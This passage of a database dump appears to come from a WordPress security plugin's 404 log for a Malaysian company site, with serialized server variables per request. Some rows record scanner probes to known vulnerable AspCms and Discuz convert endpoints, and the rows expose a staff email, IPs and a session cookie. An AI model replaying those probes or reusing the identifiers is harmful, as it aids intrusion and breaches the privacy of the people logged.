10:48:20',34441368,36244832,'https://bintara.com.my/toughbook-20/',1,0,'207.46.13.62'),(27087,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYyDl1Red5u6rkjAaVZjfQAAAAU\";s:12:\"REDIRECT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"REMOTE_ADDR\";s:13:\"104.148.105.4\";s:11:\"REMOTE_PORT\";s:5:\"50442\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:10:\"SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYyDl1Red5u6rkjAaVZjfQAAAAU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569489815.6696\";s:12:\"REQUEST_TIME\";s:10:\"1569489815\";}}','notice','2019-09-26 09:23:39','2019-09-26 09:23:36',35477144,37278688,'http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp',1,0,'104.148.105.4'),(27088,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:52:\"/utility/convert/index.php?a=config&source=d7.2_x2.0\";s:14:\"CONTENT_LENGTH\";s:3:\"948\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:73:\"http://bintara.com.my/utility/convert/index.php?a=config&source=d7.2_x2.0\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:25:\"a=config&source=d7.2_x2.0\";s:21:\"REDIRECT_QUERY_STRING\";s:25:\"a=config&source=d7.2_x2.0\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYyDoIobU@zjjbgWMCBfEgAAARc\";s:19:\"REDIRECT_SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYyDoIobU@zjjbgWMCBfEgAAARc\";s:12:\"REDIRECT_URL\";s:18:\"/convert/index.php\";s:11:\"REMOTE_ADDR\";s:13:\"104.148.105.4\";s:11:\"REMOTE_PORT\";s:5:\"64986\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:10:\"SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYyDoIobU@zjjbgWMCBfEgAAARc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569489824.1804\";s:12:\"REQUEST_TIME\";s:10:\"1569489824\";}}','notice','2019-09-26 09:23:45','2019-09-26 09:23:44',35499704,37300328,'http://bintara.com.my/utility/convert/index.php?a=config&source=d7.2_x2.0',1,0,'104.148.105.4'),(27086,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36,gzip(gfe)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"5.34.243.116\";s:11:\"REMOTE_PORT\";s:5:\"54483\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYyCgeTQ4LALSh7k@hPsiAAAAJQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569489537.6679\";s:12:\"REQUEST_TIME\";s:10:\"1569489537\";}}','notice','2019-09-26 09:18:59','2019-09-26 09:18:58',35118680,36928056,'https://bintara.com.my/?page_id=18',1,0,'5.34.243.116'),(27085,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{0114FFE9-CFF8-4A76-B6D2-F0A4A4113F75}\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=93efe738b18b6a208d544a1f95933d89\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.29.0.190908 (Intelx64 Mac OS X Version 10.14.5 (Build 18F132))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; SessionID=74394EEF-70BA-4807-910A-FA1D9FB8E7FF\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYx@mIobU@zjjbgWMCBdTwAAARY\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.145.128\";s:11:\"REMOTE_PORT\";s:5:\"53313\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYx@mIobU@zjjbgWMCBdTwAAARY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569488537.1645\";s:12:\"REQUEST_TIME\";s:10:\"1569488537\";}}','notice','2019-09-26 09:02:19','2019-09-26 09:02:17',35487408,37290128,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'115.132.145.128'),(27084,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/18-2__trashed/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/18-2__trashed/\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/18-2__trashed/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYx6BeTQ4LALSh7k@hPmagAAAIo\";s:12:\"REDIRECT_URL\";s:15:\"/18-2__trashed/\";s:11:\"REMOTE_ADDR\";s:13:\"157.55.39.198\";s:11:\"REMOTE_PORT\";s:5:\"27409\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/18-2__trashed/\";s:10:\"SCRIPT_URL\";s:15:\"/18-2__trashed/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYx6BeTQ4LALSh7k@hPmagAAAIo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569487365.9242\";s:12:\"REQUEST_TIME\";s:10:\"1569487365\";}}','notice','2019-09-26 08:42:47','2019-09-26 08:42:46',34039000,35837320,'https://bintara.com.my/18-2__trashed/',1,0,'157.55.39.198'),(27083,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{CB59FF3B-0B9B-4C57-B3DD-8CA189FA4E38}\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.29.0.190908 (Intelx64 Mac OS X Version 10.14.5 (Build 18F132))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; SessionID=74394EEF-70BA-4807-910A-FA1D9FB8E7FF\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYxtAoobU@zjjbgWMCBXaAAAAQA\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.145.128\";s:11:\"REMOTE_PORT\";s:5:\"52976\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYxtAoobU@zjjbgWMCBXaAAAAQA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569484034.8372\";s:12:\"REQUEST_TIME\";s:10:\"1569484034\";}}','notice','2019-09-26 07:47:17','2019-09-26 07:47:15',35482552,37272904,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'115.132.145.128'),(27081,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:26:\"/blog/2018/12/12/onepress/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:48:\"https://bintara.com.my/blog/2018/12/12/onepress/\";s:15:\"HTTP_USER_AGENT\";s:82:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) Gecko/20100101 Firefox/52.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:19:\"HTTP_X_MERGE_ASSETS\";s:4:\"true\";s:15:\"HTTP_X_PREBUILD\";s:4:\"true\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:48:\"https://bintara.com.my/blog/2018/12/12/onepress/\";s:19:\"REDIRECT_SCRIPT_URL\";s:26:\"/blog/2018/12/12/onepress/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYxdyBUSlOK4dwtqdubuxwAAAFU\";s:12:\"REDIRECT_URL\";s:26:\"/blog/2018/12/12/onepress/\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"46492\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:48:\"https://bintara.com.my/blog/2018/12/12/onepress/\";s:10:\"SCRIPT_URL\";s:26:\"/blog/2018/12/12/onepress/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYxdyBUSlOK4dwtqdubuxwAAAFU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569480136.1892\";s:12:\"REQUEST_TIME\";s:10:\"1569480136\";}}','notice','2019-09-26 06:42:17','2019-09-26 06:42:16',35167824,36974248,'https://bintara.com.my/blog/2018/12/12/onepress/',1,0,'103.6.198.69'),(27082,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"013E998B-19AC-4F23-8F40-281C0D8291B0\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYxn4YobU@zjjbgWMCBSzAAAAQI\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.145.128\";s:11:\"REMOTE_PORT\";s:5:\"52125\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYxn4YobU@zjjbgWMCBSzAAAAQI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569482721.3676\";s:12:\"REQUEST_TIME\";s:10:\"1569482721\";}}','notice','2019-09-26 07:25:24','2019-09-26 07:25:21',35877024,37673384,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.145.128'),(27080,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:50:\"/blog/2019/02/14/965ea6c2984e45b328cac10cab17b1e6/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, 